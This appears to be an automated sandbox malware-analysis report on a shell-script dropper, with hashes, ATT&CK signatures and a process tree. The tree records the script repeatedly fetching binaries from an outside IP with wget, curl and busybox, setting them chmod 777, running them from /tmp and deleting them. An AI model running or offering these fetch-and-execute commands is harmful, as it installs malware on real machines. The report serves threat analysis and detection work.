Analysis
-
max time kernel
96s
max time network
99s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
submitted
21/10/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
-
Size
10KB
-
MD5
bd77f6652549a8b0545e6296982a1ac8
-
SHA1
1b2fba63b17d3b1b6408006f4fd88c0774f434ce
-
SHA256
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
-
SHA512
7953842db2ac9405140c5484229617b419a3e7e708089c0874dc8093818df33a1c9021685315fbdd46912ffb2291530bd1a9e73449a415ba718b6d6143a1059d
-
SSDEEP
96:50UpzQs+B+82C/GGSF5iRBuYQohM93Y69bY+2C/GGZkF5iRBtpKEjQoxMVUm0UpM:zuB+TwK3yxuJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process
871 chmod
877 chmod
901 chmod
895 chmod
919 chmod
859 chmod
883 chmod
889 chmod
931 chmod
955 chmod
961 chmod
840 chmod
907 chmod
913 chmod
737 chmod
802 chmod
808 chmod
817 chmod
937 chmod
949 chmod
967 chmod
745 chmod
751 chmod
865 chmod
925 chmod
943 chmod
973 chmod
979 chmod
Executes dropped EXE 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process
910 wget
915 rm
886 wget
891 rm
890 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
911 curl
912 busybox
914 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
887 curl
888 busybox
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:733
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:741
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:744
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:750
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:800
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:807
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:816
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:836
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:858
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:864
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:870
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:876
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:882
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:890
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:894
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:900
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:906
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:914
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:918
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:924
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:930
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:936
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:942
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:948
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:954
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:960
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:966
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:972
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:978
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97